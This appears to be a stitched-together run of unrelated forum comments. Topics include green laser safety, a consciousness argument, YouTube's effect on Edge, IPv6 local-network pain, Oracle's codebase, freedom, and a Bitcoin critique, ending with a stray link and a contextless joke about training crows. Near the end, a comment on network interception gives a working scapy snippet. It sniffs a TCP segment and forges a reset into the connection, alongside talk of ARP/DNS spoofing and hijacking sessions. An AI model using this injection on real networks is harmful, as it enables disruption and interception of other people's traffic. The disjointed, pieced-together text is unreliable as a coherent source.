I just searched Amazon. There are plenty of green “diode” lasers, 532nm, ~100mW, for very little money. I don’t believe that for a second — those are surely crappy frequency doubled Nd:YAG lasers, probably unfiltered (that filter wouldn’t be cheap, and it might fail anyway under that ridiculous power level), and they will blind you when some funny reflection of the, I dunno, 500mW of stray IR light hits your eye.
Now that real name brand laser pointers are mostly gone, if you actually want green, get a 515nm laser or something along those lines. Stay away from 532nm!
If you believe that what we describe as "consciousness" is emergent from the ideas a material brain develops about itself, then it's in fact not logically possible to have a world that is physically identical to ours yet does not contain consciousness. So indeed, premise 2. sneaks in the conclusion.
To illustrate this point, here's an argument with the same structure that would similarly "prove" that gravity doesn't cause things to fall down:
1. In our world, there is gravity and things fall down.
2. There is a logically possible world where there is gravity yet things do not fall down.
3. Therefore, things falling down is a further fact about our world, over and above gravity.
4. So, gravity causing things to fall down is false.
"For example, they may start integrating technologies for which they have exclusive, or at least 'special' access. Can you imagine if all of a sudden Google apps start performing better than anyone else's?"
This is already happening. I very recently worked on the Edge team, and one of the reasons we decided to end EdgeHTML was that Google kept making changes to its sites that broke other browsers, and we couldn't keep up. For example, they recently added a hidden empty div over YouTube videos that causes our hardware acceleration fast-path to bail (this should now be fixed in the Win10 Oct update). Prior to that, our fairly state-of-the-art video acceleration put us well ahead of Chrome on video playback time on battery, but almost the instant they broke things on YouTube, they started advertising Chrome's dominance over Edge on video-watching battery life. What makes it so sad is that their claimed dominance was not due to ingenious optimization work by Chrome, but to a failure on YouTube's side. On the whole, they only made the web slower.
Now, while I'm not sure I'm convinced that YouTube was changed intentionally to slow Edge, many of my co-workers are quite convinced, and they're the ones who looked into it personally. To add to all this, when we asked, YouTube turned down our request to remove the hidden empty div and did not elaborate further.
You're supposed to use McDonald's fries, and some light rock-throwing toward the opposing faction. Traditionally this is how murder-crows have been trained since at least 2013. The whole process takes a few weeks.
About a year ago there was something of a "joke isEven() implementation discourse" on Twitter, which eventually evolved into a sort of informal optimizer-abuse contest. For example:
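Something in that spirit, a deliberately silly implementation that still gets the right answer (my own sketch, not one of the actual entries from that thread):

    # Purely illustrative joke isEven(): walk toward zero two steps at a time
    # and see whether we land on 0 (even) or 1 (odd).
    def is_even(n: int) -> bool:
        n = abs(n)
        while n > 1:
            n -= 2
        return n == 0

    print([is_even(i) for i in (-3, 0, 2, 7)])   # [False, True, True, False]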
While routing at global scale is much easier, running v6 in a local network has more moving parts than v4 had:
- broadcasts for address discovery have been replaced by multicast, which is much harder for switches to handle correctly
- address discovery is now mostly handled via SLAAC, which works differently from DHCP and doesn't universally allow setting name servers, so you will still need DHCP to actually get a working network (if you run v6 only); now you have two daemons running where in v4 you only needed one.
- hosts are multi-homed by default and rely heavily on being multi-homed, which might invalidate some assumptions you made when configuring hosts.
- for a network to be meaningfully usable, you need working name resolution, because while you can remember v4 addresses and v4 address assignments, that is impossible for v6 addresses (yes, you can of course manually assign addresses in your prefix, keep them to low numbers, and hide everything else behind a ::, but you still have to remember your prefix, which is still impossibly hard, and there's no cheating there even if you know somebody at your ISP, because it's not entirely under their control either)
- and in a similar vein: subnetting is harder because the addresses are much less memorable. If you want to subnet a 10.x v4 network, in many cases you can do this in very memorable full-byte chunks (see the sketch after this list).
- also subnetting: because many ISPs still hand out /64 allocations to their customers, and because of the way SLAAC works, you often have to decide between subnetting and SLAAC (which is still the default in many OSes). Worse, some ISPs only do a /128 assignment (one address), so now you're back in NAT territory, only those are really, really murky waters, because next to nobody is doing v6 NAT at the moment. If your ISP only gives you a single v6 address, you are practically stuck when it comes to running v6 internally. If you're given a single v4 address (which is common practice), you can do NAT/RFC1918 addressing and you're fine.
- v6 relies on ICMPv6 much more heavily (neighbor discovery, path MTU discovery), but this fact has not propagated to default firewall settings, so in many default "let me turn on the firewall" configs, your v6 network will break in mysterious ways.
- in home networks where you want devices to be reachable directly (for P2P uses like video calls or gaming), there's no widely supported equivalent of UPnP or NAT-PMP yet to punch holes into your firewall and make clients reachable. Yes, you don't have to do NAT any more, so clients are potentially reachable, but you really don't want everything exposed, so your firewall is still blocking all incoming connections, and now there's no way for an application to punch temporary holes through it, which is a solved problem in v4 (where a hole is punched and a temporary port mapping is created)
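To make the subnetting point concrete, here's a minimal sketch using Python's standard ipaddress module, with documentation prefixes as placeholders for whatever your ISP actually delegates:

    import ipaddress

    v4 = ipaddress.ip_network("10.0.0.0/8")
    print([str(n) for n in list(v4.subnets(new_prefix=16))[:3]])
    # ['10.0.0.0/16', '10.1.0.0/16', '10.2.0.0/16']  -- easy to keep in your head

    v6 = ipaddress.ip_network("2001:db8:1234:ff00::/56")
    print([str(n) for n in list(v6.subnets(new_prefix=64))[:3]])
    # ['2001:db8:1234:ff00::/64', '2001:db8:1234:ff01::/64', '2001:db8:1234:ff02::/64']
    # SLAAC only works on /64s, so if all you get is a single /64 (or worse, a /128),
    # subnetting like this isn't even on the table.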
There are more issues as your network grows bigger, but this is what I had to deal with in my small networks (<50 hosts), where I can say with certainty that v4 was much more straightforward to get up and running than v6 (though I was much older when I was learning v6 than when I was learning v4, so I might also just be getting old and slow).
Yes. These are all solvable issues, but they are huge ergonomic downsides now pushed onto local network admins, to the point that it's still much easier for them to just disable IPv6 than to learn about all these small issues and work around them.
So while v6 is much easier to handle at the global scale, it's at the same time much harder to handle at your local site. But the internet is as much about the global scale as it is about the local site, and when the new thing is much harder to use than the old thing, inertia is even bigger than in the normal "everything is mostly the same" case (where inertia already feels like an insurmountable problem).
What an unimaginable horror! You can't change a single line of code in the product without breaking 1000s of existing tests. Generations of programmers have worked on that code under difficult deadlines and filled the code with all kinds of crap.
Very complex pieces of logic, memory management, context switching, etc. are all held together with thousands of flags. The whole code is riddled with mysterious macros that one cannot decipher without picking up a notebook and expanding the relevant parts of the macros by hand. It can take a day or two to really understand what a macro does.
Sometimes one needs to understand the values and the effects of 20 different flags to predict how the code would behave in different situations. Sometimes 100s of them! I am not exaggerating.
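To give a flavor of what that looks like, here's a purely illustrative sketch with invented flag names (obviously nothing like the real code): each old fix leaves behind one more flag, and predicting behavior means knowing how all of them interact.

    # Purely illustrative "flag soup" sketch -- invented names, not Oracle code.
    def flush_path(flags: dict) -> str:
        if flags.get("USE_NEW_LATCH") and not flags.get("LEGACY_CTX_SWITCH"):
            if flags.get("WORKAROUND_BUG_4711"):        # someone's fix from years ago
                return "slow drain (workaround path)"
            if flags.get("FORCE_SYNC") or flags.get("NUMA_AFFINITY_V2"):
                return "sync drain"
            return "fast drain"
        if flags.get("LEGACY_CTX_SWITCH") and not flags.get("WORKAROUND_BUG_9042"):
            return "legacy drain"
        return "default drain"

    # With 20 such booleans there are 2**20 (~1 million) combinations to reason about.
    print(flush_path({"USE_NEW_LATCH": True, "WORKAROUND_BUG_4711": True}))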
The only reason why this product is still surviving and still works is due to literally millions of tests!
Here is what the life of an Oracle Database developer looks like:
- Start working on a new bug.
- Spend two weeks trying to understand the 20 different flags that interact in mysterious ways to cause this bug.
- Add one more flag to handle the new special scenario. Add a few more lines of code that check this flag, work around the problematic situation, and avoid the bug.
- Submit the changes to a test farm consisting of about 100 to 200 servers that would compile the code, build a new Oracle DB, and run the millions of tests in a distributed fashion.
- Go home. Come back the next day and work on something else. The tests can take 20 to 30 hours to complete.
- Go home. Come back the next day and check your farm test results. On a good day, there would be about 100 failing tests. On a bad day, there would be about 1000 failing tests. Pick some of these tests randomly and try to understand what went wrong with your assumptions. Maybe there are another 10 flags to consider to truly understand the nature of the bug.
- Add a few more flags in an attempt to fix the issue. Submit the changes again for testing. Wait another 20 to 30 hours.
- Rinse and repeat for another two weeks until you get the mysterious incantation of flags right.
- Finally one fine day you would succeed with 0 tests failing.
- Add a hundred more tests for your new change to ensure that the next developer who has the misfortune of touching this new piece of code never ends up breaking your fix.
- Submit the work for one final round of testing. Then submit it for review. The review itself may take another 2 weeks to 2 months. So now move on to the next bug to work on.
- After 2 weeks to 2 months, when everything is complete, the code would finally be merged into the main branch.
The above is a non-exaggerated description of the life of a programmer at Oracle fixing a bug. Now imagine what a horror it is going to be to develop a new feature. It takes 6 months to a year (sometimes two years!) to develop a single small feature (say, adding a new mode of authentication, like support for AD authentication).
The fact that this product even works is nothing short of a miracle!
I don't work for Oracle anymore. Will never work for Oracle again!
I always considered "free" as the lack of "coercion", where "coercion" has an agent/subject that can be removed to make the situation better. Under that definition, the answers are:
> If I put a gun to your head and say "Your wallet or your life," are you free?
No -- the subject is you and your gun; if you remove them, the situation improves.
> If I lay a trap, and you fall into it, and I offer to release you if you give me your bank details, are you free?
No -- the subject is your trap; if you remove it, the situation improves.
> If it's a disaster and I charge $10000 for a bottle of clean water, are you free?
Yes -- while there is a subject (you), removing it will not make the situation any better at all.
> If a society requires you to work in order to live but only offers you poor options for work, are you free?
Depends?
In the USSR, with exit visas and "social parasitism" laws, no. The agent is the state, and removing it would make the situation better -- yes, you would still be hungry, but at least they would not arrest you, and you could try your luck in another country.
In the USA, mostly yes. There is nothing you can remove to get better options for work, or to allow living without work. There are some exceptions -- like anti-vagrancy laws and job licensing -- but they do not affect most people.
Blockchain is the world's worst database, created entirely to maintain the reputations of venture capital firms who injected hundreds of millions of dollars into a technology whose core defining insight was "You can improve on a Ponzi scam by making it self-organizing and distributed; that gets vastly more distribution, reduces the single point of failure, and makes it censorship-resistant."
That's more robust than I usually phrase things on HN, but you did ask. In slightly more detail:
Databases are wonderful things. We have a number of them actually employed in production, at a variety of institutions. They run the world. Meaningful applications run on top of Postgres, MySQL, Oracle, etc., etc.
No meaningful applications run on top of "blockchain", because it is a marketing term. You cannot install blockchain, just like you cannot install database. (Database sounds much cooler without the definite article, too.) If you pick a particular instantiation of a blockchain-style database, it is a horrible, horrible database.
Can I pick on Bitcoin? Let me pick on Bitcoin. Bitcoin is claimed to be a global financial network and ready for production right now. Bitcoin cannot sustain 5 transactions per second, worldwide.
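That ceiling follows directly from block size and block interval. A quick back-of-the-envelope, assuming roughly the figures of the time (1 MB blocks, ~250 bytes per average transaction, one block every ~10 minutes; all three are assumptions for illustration):

    block_bytes = 1_000_000
    avg_tx_bytes = 250
    block_interval_s = 600

    tx_per_block = block_bytes // avg_tx_bytes      # ~4,000 transactions per block
    tps_ceiling = tx_per_block / block_interval_s   # ~6.7 tps, absolute best case
    print(tx_per_block, round(tps_ceiling, 1))
    # Real transactions tend to be larger than 250 bytes, so sustained
    # throughput lands closer to 3-4 tps.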
You might be sensibly interested in Bitcoin governance if, for some reason, you wanted to use Bitcoin. Bitcoin is a software artifact; it matters to users who makes changes to it and by what process. (Bitcoin is a software artifact, not a protocol, even though the Bitcoin community will tell you differently. There is a single C++ codebase which matters. It is essentially impossible to interoperate with Bitcoin without replicating that codebase, bugs and all.) Bitcoin governance is captured by approximately five people. That is a strong claim, and it requires extraordinary evidence.
Ordinary evidence would be pointing you, in a handwavy fashion, at the depth of acrimony with regard to raising the block size, which would let Bitcoin scale to the commanding heights of 10 or, nay, 100 transactions per second worldwide.
Extraordinary evidence might be pointing you to the time when the entire Bitcoin network was de facto shut down based on the consensus of N people in an IRC channel. cf. https://news.ycombinator.com/item?id=9320989 This was back in 2013. Long story short: a software update went awry, so they rolled back global state by a few hours by getting the right two people to agree to it on a Skype call.
But let's get back to discussing that sole technical artifact. Bitcoin has a higher cost-to-value ratio than almost any technology conceivable; the cost to date is the market capitalization of Bitcoin. Because Bitcoin enters circulation through a seigniorage mechanism, every Bitcoin in existence was minted as compensation for "securing the integrity of the blockchain" (by doing computationally expensive makework).
This cost is high. Today, routine maintenance of the Bitcoin network will cost the network approximately $1.5 million. That's on the order of $3 per write on a maximum committed capacity basis. It will cost another $1.5 million tomorrow, exchange rate depending.
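Where those numbers come from, roughly, under assumed figures from around the time of this comment (25 BTC block subsidy, ~144 blocks a day, a price around $420, ~4,000 transactions per block at absolute best; exchange rate depending, as noted):

    subsidy_btc = 25
    blocks_per_day = 144
    usd_per_btc = 420
    max_tx_per_block = 4_000

    daily_cost = subsidy_btc * blocks_per_day * usd_per_btc   # USD value of BTC minted per day
    max_writes = blocks_per_day * max_tx_per_block            # writes/day at full capacity
    print(f"${daily_cost:,} per day, ~${daily_cost / max_writes:.2f} per write")
    # -> $1,512,000 per day, ~$2.62 per write at maximum committed capacity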
(Bitcoin has successfully shifted much of the cost of operating its database to speculators rather than people who actually use Bitcoin for transaction processing. That game of musical chairs has gone on for a while.)
Bitcoin has some properties which one does not associate with many databases. One is that write acknowledgments average 5 minutes. Another is that they can stop, non-deterministically, for more than an hour at a time, worldwide, for all users simultaneously. This behavior is by design.
I can go on, and probably will some other day. This is a bit of a hobby for me.
Can you give me an example of a connection that can be passively sniffed but not injected into? Unless you have some wacky physical medium with no Tx, if you can see their traffic you can at the very least send spoofed packets to the destination or source. If you're on the source's LAN, you can just spoof DNS and/or ARP for either the default gateway or the destination. If you're on the destination's LAN, you can spoof the destination or do packet injection. If you're in between either LAN, you can arguably do any damn thing you like, depending on network topology and routes. But I don't see a case where I could see the traffic and not do something to either downgrade the connection, hijack it, or MITM it.
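To make that concrete, here's a minimal sketch with scapy (needs root; "eth0" is a placeholder interface, and this assumes plain IPv4): if you're positioned to observe one TCP segment of a flow, you already have everything you need to forge a matching packet into it, e.g. a RST.

    # If you can sniff it, you can inject into it: observe one TCP segment,
    # then forge a RST that matches it.
    from scapy.all import IP, TCP, send, sniff

    pkt = sniff(iface="eth0", filter="tcp and ip", count=1)[0]
    ip, tcp = pkt[IP], pkt[TCP]
    rst = IP(src=ip.src, dst=ip.dst) / TCP(sport=tcp.sport, dport=tcp.dport,
                                           seq=tcp.seq + len(tcp.payload),
                                           flags="R")
    send(rst, verbose=False)    # the receiver can't tell this from the real sender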
So they're risking their data on the uncertain possibility that a user might catch on that I've been downgrading their sessions and stealing everything? Once you explain this to a user, do you think they'll really trust it?
https://github.com/Svensson-Lab/pro-hormone-predictor/blob/m...